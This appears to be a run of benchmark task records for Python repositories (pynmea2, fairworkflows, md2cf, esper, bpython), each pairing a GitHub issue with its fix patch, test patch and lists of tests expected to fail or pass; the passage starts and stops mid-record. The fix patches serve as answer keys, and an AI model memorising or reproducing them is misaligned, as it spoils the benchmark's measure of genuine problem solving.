+ assert msg.datetime == datetime.datetime(2008, 7, 6, 1, 2, 3, 50000, tzinfo=datetime.timezone.utc)
+ assert msg.localdatetime == datetime.datetime(2008, 7, 5, 17, 32, 3, 50000, tzinfo=msg.tzinfo)
def test_VPW():
data = "$XXVPW,1.2,N,3.4,M"
|
RMC message is parsed without a timezone
Per the spec: https://www.trimble.com/OEM_ReceiverHelp/V4.44/en/NMEA-0183messages_RMC.html the date time in the RMC message is UTC, however, pynmea2 parses it and creates a date time with no timezone, thus calling timestamp() on the returned date returns the wrong timestamp.
To reproduce:
```
msg = '$GPRMC,184446.000,A,3720.18653,N,12153.38874,W,0.0,0.0,130220,,,A*7E'
parsed = pynmea2.parse(msg)
assert parsed.datetime.timestamp() == 1581619486.0
```
The above assertion fails unless your computer is set to UTC timezone.
The workaround to the bug for anyone else bumping against this is to `replace` the datetime with one that has the proper timezone:
```
msg = '$GPRMC,184446.000,A,3720.18653,N,12153.38874,W,0.0,0.0,130220,,,A*7E'
parsed = pynmea2.parse(msg)
assert parsed.datetime.replace(tzinfo=timezone.utc).timestamp() == 1581619486.0
```
|
0.0
|
988c297ce82d976db9094b435a1aa290e7d5b9ed
|
[
"test/test_proprietary.py::test_KWDWPL",
"test/test_proprietary.py::test_ubx04",
"test/test_proprietary.py::test_ubx00",
"test/test_types.py::test_GST",
"test/test_types.py::test_RMC",
"test/test_types.py::test_ZDA",
"test/test_types.py::test_GGA",
"test/test_nor.py::test_norh4",
"test/test_nor.py::test_nors1",
"test/test_nor.py::test_norbt0",
"test/test_nor.py::test_norc1",
"test/test_ash.py::test_ashratt"
] |
[
"test/test_proprietary.py::test_srf",
"test/test_proprietary.py::test_extra_comma",
"test/test_proprietary.py::test_ubx03",
"test/test_proprietary.py::test_grm",
"test/test_proprietary.py::test_proprietary_2",
"test/test_proprietary.py::test_tnl",
"test/test_proprietary.py::test_proprietary_GRMW",
"test/test_proprietary.py::test_unknown_sentence",
"test/test_proprietary.py::test_proprietary_VTX_0012",
"test/test_proprietary.py::test_proprietary_MGNWPL",
"test/test_proprietary.py::test_proprietary_type",
"test/test_proprietary.py::test_proprietary_1",
"test/test_proprietary.py::test_create",
"test/test_proprietary.py::test_proprietary_VTX_0002",
"test/test_proprietary.py::test_proprietary_3",
"test/test_proprietary.py::test_proprietary_with_comma",
"test/test_types.py::test_XDR",
"test/test_types.py::test_RMC_valid",
"test/test_types.py::test_RTE",
"test/test_types.py::test_STALK_unidentified_command",
"test/test_types.py::test_R00",
"test/test_types.py::test_TXT",
"test/test_types.py::test_STALK",
"test/test_types.py::test_VPW",
"test/test_types.py::test_GLL",
"test/test_types.py::test_BOD",
"test/test_types.py::test_GRS",
"test/test_types.py::test_MWV",
"test/test_types.py::test_VBW",
"test/test_types.py::test_GSA",
"test/test_nor.py::test_norbt9",
"test/test_nor.py::test_norc4",
"test/test_nor.py::test_nori1",
"test/test_nor.py::test_norwt7",
"test/test_nor.py::test_nors4",
"test/test_nor.py::test_nor_undefined",
"test/test_nor.py::test_norbt4",
"test/test_nor.py::test_norbt7",
"test/test_nor.py::test_norwt4",
"test/test_nor.py::test_norwt9",
"test/test_ash.py::test_ash_undefined",
"test/test_ash.py::test_ashrltn",
"test/test_ash.py::test_ashratt_with_2_vs_3_decimal_timestamp"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-10-23 03:19:41+00:00
|
mit
| 314
|
|
fair-workflows__fairworkflows-184
|
diff --git a/fairworkflows/fairstep.py b/fairworkflows/fairstep.py
index e369441..b409a74 100644
--- a/fairworkflows/fairstep.py
+++ b/fairworkflows/fairstep.py
@@ -13,6 +13,7 @@ from rdflib import RDF, RDFS, DCTERMS
from fairworkflows import namespaces, LinguisticSystem, LINGSYS_ENGLISH, LINGSYS_PYTHON
from fairworkflows.config import DUMMY_FAIRWORKFLOWS_URI, IS_FAIRSTEP_RETURN_VALUE_PARAMETER_NAME, \
LOGGER
+from fairworkflows.prov import prov_logger, StepRetroProv
from fairworkflows.rdf_wrapper import RdfWrapper, replace_in_rdf
@@ -441,7 +442,7 @@ def is_fairstep(label: str = None, is_pplan_step: bool = True, is_manual_task: b
def _add_logging(func):
@functools.wraps(func)
def _wrapper(*func_args, **func_kwargs):
- LOGGER.info(f'Running step: {func.__name__}')
+ prov_logger.add(StepRetroProv(step=fairstep))
return func(*func_args, **func_kwargs)
return _wrapper
func._fairstep = fairstep
diff --git a/fairworkflows/fairworkflow.py b/fairworkflows/fairworkflow.py
index 587563c..11a01a9 100644
--- a/fairworkflows/fairworkflow.py
+++ b/fairworkflows/fairworkflow.py
@@ -7,18 +7,18 @@ from pathlib import Path
from tempfile import TemporaryDirectory
from typing import Iterator, Optional, Callable
-import nanopub
import networkx as nx
import noodles
import rdflib
from noodles.interface import PromisedObject
-from rdflib import RDF, RDFS, DCTERMS
+from rdflib import RDF
from rdflib.tools.rdf2dot import rdf2dot
from requests import HTTPError
+from fairworkflows import namespaces, LinguisticSystem, LINGSYS_PYTHON
from fairworkflows.config import LOGGER
-from fairworkflows import namespaces, LinguisticSystem, LINGSYS_ENGLISH, LINGSYS_PYTHON
from fairworkflows.fairstep import FairStep
+from fairworkflows.prov import WorkflowRetroProv, prov_logger
from fairworkflows.rdf_wrapper import RdfWrapper
@@ -363,47 +363,31 @@ class FairWorkflow(RdfWrapper):
Returns a tuple (result, retroprov), where result is the final output of the executed
workflow and retroprov is the retrospective provenance logged during execution.
"""
-
if not hasattr(self, 'workflow_level_promise'):
raise ValueError('Cannot execute workflow as no noodles step_level_promise has been constructed.')
-
- log = io.StringIO()
- log_handler = logging.StreamHandler(log)
- formatter = logging.Formatter('%(asctime)s - %(message)s')
- log_handler.setFormatter(formatter)
-
- LOGGER.setLevel(logging.INFO)
- LOGGER.handlers = [log_handler]
+ prov_logger.empty()
self.workflow_level_promise = noodles.workflow.from_call(
noodles.get_workflow(self.workflow_level_promise).root_node.foo, args, kwargs, {})
result = noodles.run_single(self.workflow_level_promise)
# Generate the retrospective provenance as a (nano-) Publication object
- retroprov = self._generate_retrospective_prov_publication(log.getvalue())
+ retroprov = self._generate_retrospective_prov_publication()
return result, retroprov
- def _generate_retrospective_prov_publication(self, log:str) -> nanopub.Publication:
+ def _generate_retrospective_prov_publication(self) -> WorkflowRetroProv:
"""
Utility method for generating a Publication object for the retrospective
provenance of this workflow. Uses the given 'log' string as the actual
provenance for now.
"""
- log_message = rdflib.Literal(log)
- this_retroprov = rdflib.BNode('retroprov')
- if self.uri is None or self.uri == 'None': # TODO: This is horrific
- this_workflow = rdflib.URIRef('http://www.example.org/unpublishedworkflow')
+ if self._is_published:
+ workflow_uri = rdflib.URIRef(self.uri)
else:
- this_workflow = rdflib.URIRef(self.uri)
-
- retroprov_assertion = rdflib.Graph()
- retroprov_assertion.add((this_retroprov, rdflib.RDF.type, namespaces.PROV.Activity))
- retroprov_assertion.add((this_retroprov, namespaces.PROV.wasDerivedFrom, this_workflow))
- retroprov_assertion.add((this_retroprov, RDFS.label, log_message))
- retroprov = nanopub.Publication.from_assertion(assertion_rdf=retroprov_assertion)
-
- return retroprov
+ workflow_uri = rdflib.URIRef('http://www.example.org/unpublishedworkflow')
+ step_provs = prov_logger.get_all()
+ return WorkflowRetroProv(self, workflow_uri, step_provs)
def draw(self, filepath):
"""Visualize workflow.
diff --git a/fairworkflows/linguistic_system.py b/fairworkflows/linguistic_system.py
index 3dfa785..4a4adcc 100644
--- a/fairworkflows/linguistic_system.py
+++ b/fairworkflows/linguistic_system.py
@@ -56,5 +56,5 @@ LINGSYS_ENGLISH = LinguisticSystem(lstype=DC.LinguisticSystem,
LINGSYS_PYTHON = LinguisticSystem(lstype=SCHEMAORG.ComputerLanguage,
label='python',
version_info='.'.join([str(v) for v in sys.version_info]),
- see_also="https://en.wikipedia.org/wiki/Python_(programming_language)")
+ see_also="https://www.wikidata.org/wiki/Q28865")
diff --git a/fairworkflows/prov.py b/fairworkflows/prov.py
new file mode 100644
index 0000000..d138b62
--- /dev/null
+++ b/fairworkflows/prov.py
@@ -0,0 +1,95 @@
+import threading
+from datetime import datetime
+from typing import List, Iterator
+
+import rdflib
+
+from fairworkflows import namespaces
+from fairworkflows.rdf_wrapper import RdfWrapper
+
+
+class ProvLogger:
+ def __init__(self):
+ self.lock = threading.Lock()
+ self.items = []
+
+ def add(self, item):
+ with self.lock:
+ self.items.append(item)
+
+ def get_all(self):
+ with self.lock:
+ items, self.items = self.items, []
+ return items
+
+ def empty(self):
+ self.items = []
+
+
+prov_logger = ProvLogger()
+
+
+class RetroProv(RdfWrapper):
+ def __init__(self):
+ super().__init__(uri=None, ref_name='retroprov')
+ self.timestamp = datetime.now()
+
+
+class StepRetroProv(RetroProv):
+ def __init__(self, step):
+ super().__init__()
+ self.set_attribute(rdflib.RDF.type, namespaces.PPLAN.Activity)
+ self.step = step
+ self.step_uri = step.uri
+
+ @property
+ def step_uri(self):
+ """Refers to URI of step associated to this provenance.
+
+ Matches the predicate prov:wasDerivedFrom associated to this retrospective provenance
+ """
+ return self.get_attribute(namespaces.PROV.wasDerivedFrom)
+
+ @step_uri.setter
+ def step_uri(self, value):
+ self.set_attribute(namespaces.PPLAN.correspondsToStep, rdflib.URIRef(value), overwrite=True)
+
+ def __str__(self):
+ """String representation."""
+ s = f'Step retrospective provenance.\n'
+ s += self._rdf.serialize(format='trig').decode('utf-8')
+ return s
+
+
+class WorkflowRetroProv(RetroProv):
+ def __init__(self, workflow, workflow_uri, step_provs: List[StepRetroProv]):
+ super().__init__()
+ self.set_attribute(rdflib.RDF.type, namespaces.PPLAN.Bundle)
+ self.workflow = workflow
+ self.workflow_uri = workflow_uri
+ self._step_provs = step_provs
+
+ @property
+ def workflow_uri(self):
+ """Refers to URI of step associated to this provenance.
+
+ Matches the predicate prov:wasDerivedFrom associated to this retrospective provenance
+ """
+ return self.get_attribute(namespaces.PROV.wasDerivedFrom)
+
+ @workflow_uri.setter
+ def workflow_uri(self, value):
+ self.set_attribute(namespaces.PROV.wasDerivedFrom, rdflib.URIRef(value), overwrite=True)
+
+ def __iter__(self) -> Iterator[StepRetroProv]:
+ """Iterate over StepRetroProv that were part of the execution of the workflow."""
+ yield from self._step_provs
+
+ def __len__(self) -> int:
+ return len(self._step_provs)
+
+ def __str__(self):
+ """String representation."""
+ s = f'Workflow retrospective provenance.\n'
+ s += self._rdf.serialize(format='trig').decode('utf-8')
+ return s
|
fair-workflows/fairworkflows
|
c2982f60dc41b712a16a31227c7c1b6b82ccbcd5
|
diff --git a/tests/test_fairworkflow.py b/tests/test_fairworkflow.py
index 991cf42..e368e9c 100644
--- a/tests/test_fairworkflow.py
+++ b/tests/test_fairworkflow.py
@@ -9,6 +9,7 @@ from requests import HTTPError
from conftest import skip_if_nanopub_server_unavailable, read_rdf_test_resource
from fairworkflows import FairWorkflow, FairStep, namespaces, FairVariable, is_fairstep, is_fairworkflow
+from fairworkflows.prov import WorkflowRetroProv, StepRetroProv
from fairworkflows.rdf_wrapper import replace_in_rdf
from nanopub import Publication
@@ -351,11 +352,11 @@ class TestFairWorkflow:
result, prov = fw.execute(1, 4, 3)
assert result == -66
- assert isinstance(prov, Publication)
-
- prov_log = str(list(prov.assertion.objects(rdflib.URIRef(f'{DUMMY_NANOPUB_URI}#retroprov'),
- rdflib.RDFS.label))[0])
- assert 'Running step: add' in prov_log
+ assert isinstance(prov, WorkflowRetroProv)
+ assert len(prov) == 4
+ for step_prov in prov:
+ assert isinstance(step_prov, StepRetroProv)
+ assert step_prov.step in fw._steps.values()
def test_workflow_complex_serialization(self):
class OtherType:
@@ -375,7 +376,7 @@ class TestFairWorkflow:
result, prov = fw.execute(obj)
assert isinstance(result, type(obj))
assert result.message == obj.message
- assert isinstance(prov, Publication)
+ assert isinstance(prov, WorkflowRetroProv)
def test_workflow_non_decorated_step(self):
def return_value(a: float) -> float:
|
.execute() should return a FairProv object
- [ ] `.execute()` method now returns a Publication object, it should be a FairProv object (which subclasses `RdfWrapper`)
- [ ] Add some useful RDF to it based on the logging from noodles execution, you might want to use `schedule_hint` and pass it the uri of the steps, i.e. https://noodles.readthedocs.io/en/latest/boil_tutorial.html#friendly-output-and-error-handling
- [ ] If possible try to incorporate #171
|
0.0
|
c2982f60dc41b712a16a31227c7c1b6b82ccbcd5
|
[
"tests/test_fairworkflow.py::TestFairWorkflow::test_build",
"tests/test_fairworkflow.py::TestFairWorkflow::test_build_including_step_without_uri",
"tests/test_fairworkflow.py::TestFairWorkflow::test_fetch_step_404",
"tests/test_fairworkflow.py::TestFairWorkflow::test_fetch_step_500",
"tests/test_fairworkflow.py::TestFairWorkflow::test_iterator",
"tests/test_fairworkflow.py::TestFairWorkflow::test_iterator_one_step",
"tests/test_fairworkflow.py::TestFairWorkflow::test_iterator_sorting_failed",
"tests/test_fairworkflow.py::TestFairWorkflow::test_draw_without_graphviz_module",
"tests/test_fairworkflow.py::TestFairWorkflow::test_display_rdf_without_graphviz_module",
"tests/test_fairworkflow.py::TestFairWorkflow::test_publish_as_nanopub_no_modifications",
"tests/test_fairworkflow.py::TestFairWorkflow::test_workflow_construction_and_execution",
"tests/test_fairworkflow.py::TestFairWorkflow::test_workflow_complex_serialization",
"tests/test_fairworkflow.py::TestFairWorkflow::test_workflow_non_decorated_step",
"tests/test_fairworkflow.py::TestFairWorkflow::test_workflow_mixed_decorated_steps"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_issue_reference",
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-02-16 12:47:16+00:00
|
apache-2.0
| 2,247
|
|
iamjackg__md2cf-97
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 3614043..a26d632 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,10 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+## Unreleased
+### Fixed
+- Local section links are no longer rendered as broken relative links (e.g. `[this section](#section-header)`)
+
## 2.2.0 - 2023-07-08
### Added
- Relative links support section headers (@jimstein3d)
diff --git a/md2cf/confluence_renderer.py b/md2cf/confluence_renderer.py
index 5829fa2..74b3496 100644
--- a/md2cf/confluence_renderer.py
+++ b/md2cf/confluence_renderer.py
@@ -105,8 +105,10 @@ class ConfluenceRenderer(mistune.Renderer):
def link(self, link, title, text):
parsed_link = urlparse(link)
- if self.enable_relative_links and (
- not parsed_link.scheme and not parsed_link.netloc
+ if (
+ self.enable_relative_links
+ and (not parsed_link.scheme and not parsed_link.netloc)
+ and parsed_link.path
):
# relative link
replacement_link = f"md2cf-internal-link-{uuid.uuid4()}"
|
iamjackg/md2cf
|
1572ed3c4ecf849b8602d25b733852338f131baf
|
diff --git a/test_package/unit/test_renderer.py b/test_package/unit/test_renderer.py
index 40c50fc..1ab9596 100644
--- a/test_package/unit/test_renderer.py
+++ b/test_package/unit/test_renderer.py
@@ -1,3 +1,7 @@
+import re
+
+import pytest
+
from md2cf.confluence_renderer import ConfluenceRenderer, ConfluenceTag
@@ -263,3 +267,93 @@ def test_renderer_remove_text_newlines():
renderer = ConfluenceRenderer(remove_text_newlines=True)
assert renderer.text(test_text) == test_stripped_text
+
+
+@pytest.mark.parametrize("relative_links", [False, True])
+def test_renderer_normal_link(relative_links):
+ renderer = ConfluenceRenderer(enable_relative_links=relative_links)
+
+ assert (
+ renderer.link(link="https://example.com", text="example link", title=None)
+ == '<a href="https://example.com">example link</a>'
+ )
+
+
+@pytest.mark.parametrize("relative_links", [False, True])
+def test_renderer_local_header_link(relative_links):
+ renderer = ConfluenceRenderer(enable_relative_links=relative_links)
+
+ assert (
+ renderer.link(link="#header-name", text="example link", title=None)
+ == '<a href="#header-name">example link</a>'
+ )
+
+
+def test_renderer_relative_link_enabled():
+ renderer = ConfluenceRenderer(enable_relative_links=True)
+
+ relative_link_regex = re.compile(
+ r"<a href=\"md2cf-internal-link-([-a-z0-9]+)\">relative link</a>"
+ )
+ temporary_link = renderer.link(
+ link="document/../path/page.md", text="relative link", title=None
+ )
+ assert relative_link_regex.match(temporary_link)
+ assert len(renderer.relative_links) == 1
+ relative_link = renderer.relative_links[0]
+
+ assert relative_link.path == "document/../path/page.md"
+ assert (
+ relative_link.replacement == f"md2cf-internal-link-"
+ f"{relative_link_regex.match(temporary_link).groups(1)[0]}"
+ )
+ assert relative_link.fragment == ""
+ assert relative_link.original == "document/../path/page.md"
+ assert relative_link.escaped_original == "document/../path/page.md"
+
+
+def test_renderer_relative_link_with_fragment_enabled():
+ renderer = ConfluenceRenderer(enable_relative_links=True)
+
+ relative_link_regex = re.compile(
+ r"<a href=\"md2cf-internal-link-([-a-z0-9]+)\">relative link</a>"
+ )
+ temporary_link = renderer.link(
+ link="document/../path/page.md#header-name", text="relative link", title=None
+ )
+ assert relative_link_regex.match(temporary_link)
+ assert len(renderer.relative_links) == 1
+ relative_link = renderer.relative_links[0]
+
+ assert relative_link.path == "document/../path/page.md"
+ assert (
+ relative_link.replacement == f"md2cf-internal-link-"
+ f"{relative_link_regex.match(temporary_link).groups(1)[0]}"
+ )
+ assert relative_link.fragment == "header-name"
+ assert relative_link.original == "document/../path/page.md#header-name"
+ assert relative_link.escaped_original == "document/../path/page.md#header-name"
+
+
+def test_renderer_relative_link_disabled():
+ renderer = ConfluenceRenderer(enable_relative_links=False)
+
+ assert (
+ renderer.link(link="document/../path/page.md", text="relative link", title=None)
+ == '<a href="document/../path/page.md">relative link</a>'
+ )
+ assert renderer.relative_links == []
+
+
+def test_renderer_relative_link_with_fragment_disabled():
+ renderer = ConfluenceRenderer(enable_relative_links=False)
+
+ assert (
+ renderer.link(
+ link="document/../path/page.md#header-name",
+ text="relative link",
+ title=None,
+ )
+ == '<a href="document/../path/page.md#header-name">relative link</a>'
+ )
+ assert renderer.relative_links == []
|
Link parsing fails for document references
Hi,
I just noticed that it's not possible to use `md2cf` anymore with document references like table of contents, since the relative path detector detects the paths that start with `#`
```md
[Frequently Asked Questions](#frequently-asked-questions-osep)
```
Having something like this in the document results in
```
Page test.md has a relative link to , which is not in the list of pages to be uploaded.
```
|
0.0
|
1572ed3c4ecf849b8602d25b733852338f131baf
|
[
"test_package/unit/test_renderer.py::test_renderer_local_header_link[True]"
] |
[
"test_package/unit/test_renderer.py::test_add_namespace",
"test_package/unit/test_renderer.py::test_tag_append",
"test_package/unit/test_renderer.py::test_tag_render",
"test_package/unit/test_renderer.py::test_tag_render_with_text",
"test_package/unit/test_renderer.py::test_tag_render_with_cdata_text",
"test_package/unit/test_renderer.py::test_tag_render_with_attribute",
"test_package/unit/test_renderer.py::test_tag_render_with_multiple_attributes",
"test_package/unit/test_renderer.py::test_tag_render_with_child",
"test_package/unit/test_renderer.py::test_tag_render_with_child_and_text",
"test_package/unit/test_renderer.py::test_renderer_reinit",
"test_package/unit/test_renderer.py::test_renderer_block_code",
"test_package/unit/test_renderer.py::test_renderer_block_code_with_language",
"test_package/unit/test_renderer.py::test_renderer_header_sets_title",
"test_package/unit/test_renderer.py::test_renderer_strips_header",
"test_package/unit/test_renderer.py::test_renderer_header_lower_level_does_not_set_title",
"test_package/unit/test_renderer.py::test_renderer_header_later_level_sets_title",
"test_package/unit/test_renderer.py::test_renderer_header_only_sets_first_title",
"test_package/unit/test_renderer.py::test_renderer_image_external",
"test_package/unit/test_renderer.py::test_renderer_image_external_alt_and_title",
"test_package/unit/test_renderer.py::test_renderer_image_internal_absolute",
"test_package/unit/test_renderer.py::test_renderer_image_internal_relative",
"test_package/unit/test_renderer.py::test_renderer_remove_text_newlines",
"test_package/unit/test_renderer.py::test_renderer_normal_link[False]",
"test_package/unit/test_renderer.py::test_renderer_normal_link[True]",
"test_package/unit/test_renderer.py::test_renderer_local_header_link[False]",
"test_package/unit/test_renderer.py::test_renderer_relative_link_enabled",
"test_package/unit/test_renderer.py::test_renderer_relative_link_with_fragment_enabled",
"test_package/unit/test_renderer.py::test_renderer_relative_link_disabled",
"test_package/unit/test_renderer.py::test_renderer_relative_link_with_fragment_disabled"
] |
{
"failed_lite_validators": [
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-07-17 15:33:37+00:00
|
mit
| 2,789
|
|
benmoran56__esper-81
|
diff --git a/esper/__init__.py b/esper/__init__.py
index c67b5dd..5ac17a7 100644
--- a/esper/__init__.py
+++ b/esper/__init__.py
@@ -215,6 +215,9 @@ class World:
entity = self._next_entity_id
+ if entity not in self._entities:
+ self._entities[entity] = {}
+
for component_instance in components:
component_type = type(component_instance)
@@ -224,9 +227,6 @@ class World:
self._components[component_type].add(entity)
- if entity not in self._entities:
- self._entities[entity] = {}
-
self._entities[entity][component_type] = component_instance
self.clear_cache()
@@ -314,9 +314,6 @@ class World:
self._components[component_type].add(entity)
- if entity not in self._entities:
- self._entities[entity] = {}
-
self._entities[entity][component_type] = component_instance
self.clear_cache()
|
benmoran56/esper
|
c413eccd6eae12556d0fbad48298f259b6c7ea7b
|
diff --git a/tests/test_world.py b/tests/test_world.py
index 8af332f..126102c 100644
--- a/tests/test_world.py
+++ b/tests/test_world.py
@@ -39,6 +39,11 @@ def test_create_entity_with_components(world):
assert world.has_component(entity2, ComponentB) is True
+def test_adding_component_to_not_existing_entity_raises_error(world):
+ with pytest.raises(KeyError):
+ world.add_component(123, ComponentA())
+
+
def test_create_entity_and_add_components(world):
entity1 = world.create_entity()
world.add_component(entity1, ComponentA())
@@ -59,18 +64,17 @@ def test_delete_entity(world):
world.add_component(entity1, ComponentC())
entity2 = world.create_entity()
world.add_component(entity2, ComponentD())
- entity3 = world.create_entity()
- world.add_component(entity3, ComponentE())
- entity4 = world.create_entity()
+ entity_with_component = world.create_entity()
+ world.add_component(entity_with_component, ComponentE())
+ empty_entity = world.create_entity()
- assert entity3 == 3
- world.delete_entity(entity3, immediate=True)
+ assert entity_with_component == 3
+ world.delete_entity(entity_with_component, immediate=True)
with pytest.raises(KeyError):
- world.components_for_entity(entity3)
+ world.components_for_entity(entity_with_component)
with pytest.raises(KeyError):
world.delete_entity(999, immediate=True)
- with pytest.raises(KeyError):
- world.delete_entity(entity4, immediate=True)
+ world.delete_entity(empty_entity, immediate=True)
def test_component_for_entity(world):
@@ -256,17 +260,22 @@ def test_cache_results(world):
assert len(list(query for query in world.get_components(ComponentB, ComponentC))) == 1
-def test_entity_exists(world):
- dead_entity = world.create_entity(ComponentB())
- world.delete_entity(dead_entity)
- empty_entity = world.create_entity()
- existent_entity = world.create_entity(ComponentA())
- future_entity = existent_entity + 1
+class TestEntityExists:
+ def test_dead_entity(self, world):
+ dead_entity = world.create_entity(ComponentB())
+ world.delete_entity(dead_entity)
+ assert not world.entity_exists(dead_entity)
+
+ def test_not_created_entity(self, world):
+ assert not world.entity_exists(123)
+
+ def test_empty_entity(self, world):
+ empty_entity = world.create_entity()
+ assert world.entity_exists(empty_entity)
- assert world.entity_exists(existent_entity)
- assert not world.entity_exists(dead_entity)
- assert not world.entity_exists(empty_entity)
- assert not world.entity_exists(future_entity)
+ def test_entity_with_component(self, world):
+ entity_with_component = world.create_entity(ComponentA())
+ assert world.entity_exists(entity_with_component)
def test_event_dispatch_no_handlers():
|
`World().create_entity()` does not create entity if no components are given
**Describe the bug**
As a factory method I assume it creates entity for sure but that do not happen is edge case of missing components.
**To Reproduce**
```python3
import esper
world = esper.World()
entity = world.create_entity()
assert world.entity_exists(entity) # raises AssertionError
```
```python3
import esper
world = esper.World()
entity = world.create_entity()
assert not world.entity_exists(entity) # not existing entity
entity_2 = world.create_entity()
assert entity_2 == 2 # Incrementing counter even though 1st one seems not to exist
```
**Expected behavior**
Imo proper behaviour is to be able to create "empty" entity and provide it with components later. Kind of how you do it with builder pattern.
Plus I've found that `add_component()` has logic for creating missing entity and that is most probably result of that bug. Following Single Responsibility Principle, that should not be part of `add_component()` method imo. See example below:
```python3
import esper
world = esper.World()
made_up_entity = 123
world.add_component(made_up_entity, None) # Imo should raise KeyError because of missing entity
world.entity_exists(made_up_entity) # Works just fine and should not
```
**Development environment:**
- Python 3.11
- Esper 2.4
**Fix proposal**
To fix that it is simple enough to pull https://github.com/benmoran56/esper/blob/master/esper/__init__.py#L227
```python3
if entity not in self._entities:
self._entities[entity] = {}
```
out of for loop in `create_entity()` method.
Consider removing entity creation from `add_component()` method.
Tell me what do you think about it, I can implement change and unit tests later on
|
0.0
|
c413eccd6eae12556d0fbad48298f259b6c7ea7b
|
[
"tests/test_world.py::test_adding_component_to_not_existing_entity_raises_error",
"tests/test_world.py::test_delete_entity",
"tests/test_world.py::TestEntityExists::test_empty_entity"
] |
[
"tests/test_world.py::test_world_instantiation",
"tests/test_world.py::test_create_entity",
"tests/test_world.py::test_create_entity_with_components",
"tests/test_world.py::test_create_entity_and_add_components",
"tests/test_world.py::test_create_entity_and_add_components_with_alias",
"tests/test_world.py::test_component_for_entity",
"tests/test_world.py::test_components_for_entity",
"tests/test_world.py::test_has_component",
"tests/test_world.py::test_has_components",
"tests/test_world.py::test_get_component",
"tests/test_world.py::test_get_two_components",
"tests/test_world.py::test_get_three_components",
"tests/test_world.py::test_try_component",
"tests/test_world.py::test_try_components",
"tests/test_world.py::test_clear_database",
"tests/test_world.py::test_add_processor",
"tests/test_world.py::test_remove_processor",
"tests/test_world.py::test_get_processor",
"tests/test_world.py::test_processor_args",
"tests/test_world.py::test_processor_kwargs",
"tests/test_world.py::test_clear_cache",
"tests/test_world.py::test_cache_results",
"tests/test_world.py::TestEntityExists::test_dead_entity",
"tests/test_world.py::TestEntityExists::test_not_created_entity",
"tests/test_world.py::TestEntityExists::test_entity_with_component",
"tests/test_world.py::test_event_dispatch_no_handlers",
"tests/test_world.py::test_event_dispatch_one_arg",
"tests/test_world.py::test_event_dispatch_two_args",
"tests/test_world.py::test_event_dispatch_incorrect_args",
"tests/test_world.py::test_set_methoad_as_handler_in_init",
"tests/test_world.py::test_set_instance_methoad_as_handler"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2023-04-20 11:26:18+00:00
|
mit
| 1,355
|
|
bpython__bpython-691
|
diff --git a/bpython/curtsiesfrontend/manual_readline.py b/bpython/curtsiesfrontend/manual_readline.py
index 35d28f54..223ec9e7 100644
--- a/bpython/curtsiesfrontend/manual_readline.py
+++ b/bpython/curtsiesfrontend/manual_readline.py
@@ -323,7 +323,7 @@ def titlecase_next_word(cursor_offset, line):
return cursor_offset, line # TODO Not implemented
-delete_word_from_cursor_back_re = LazyReCompile(r'\b\w')
+delete_word_from_cursor_back_re = LazyReCompile(r'^|\b\w')
@edit_keys.on('<Esc+BACKSPACE>')
|
bpython/bpython
|
307f855306ae8e0814458026b9fc47c1f25bf357
|
diff --git a/bpython/test/test_manual_readline.py b/bpython/test/test_manual_readline.py
index 4141292d..faf4b585 100644
--- a/bpython/test/test_manual_readline.py
+++ b/bpython/test/test_manual_readline.py
@@ -240,6 +240,12 @@ class TestManualReadline(unittest.TestCase):
"|"],
delete_word_from_cursor_back)
+ self.try_stages_kill([
+ " (( asdf |",
+ " (( |",
+ "|"],
+ delete_word_from_cursor_back)
+
class TestEdits(unittest.TestCase):
|
Option-delete doesn't delete a left paren
On line like
~~~
>>> (( asdf a sdf
>>> lots of space
~~~
pressing option-delete repeatedly doesn't delete the opening parens or leading spaces
|
0.0
|
307f855306ae8e0814458026b9fc47c1f25bf357
|
[
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_word_from_cursor_back"
] |
[
"bpython/test/test_manual_readline.py::TestManualReadline::test_back_word",
"bpython/test/test_manual_readline.py::TestManualReadline::test_backspace",
"bpython/test/test_manual_readline.py::TestManualReadline::test_beginning_of_line",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_from_cursor_back",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_from_cursor_forward",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_rest_of_word",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_word_to_cursor",
"bpython/test/test_manual_readline.py::TestManualReadline::test_end_of_line",
"bpython/test/test_manual_readline.py::TestManualReadline::test_forward_word",
"bpython/test/test_manual_readline.py::TestManualReadline::test_forward_word_empty",
"bpython/test/test_manual_readline.py::TestManualReadline::test_forward_word_end",
"bpython/test/test_manual_readline.py::TestManualReadline::test_forward_word_tabs",
"bpython/test/test_manual_readline.py::TestManualReadline::test_last_word_pos",
"bpython/test/test_manual_readline.py::TestManualReadline::test_last_word_pos_single_word",
"bpython/test/test_manual_readline.py::TestManualReadline::test_left_arrow_at_non_zero",
"bpython/test/test_manual_readline.py::TestManualReadline::test_left_arrow_at_zero",
"bpython/test/test_manual_readline.py::TestManualReadline::test_right_arrow_at_end",
"bpython/test/test_manual_readline.py::TestManualReadline::test_right_arrow_at_non_end",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_character_before_cursor",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_empty_line",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_end_of_line",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_first_character",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_word_before_cursor",
"bpython/test/test_manual_readline.py::TestManualReadline::test_yank_prev_killed_text",
"bpython/test/test_manual_readline.py::TestManualReadline::test_yank_prev_prev_killed_text",
"bpython/test/test_manual_readline.py::TestEdits::test_config",
"bpython/test/test_manual_readline.py::TestEdits::test_functions_with_bad_return_values",
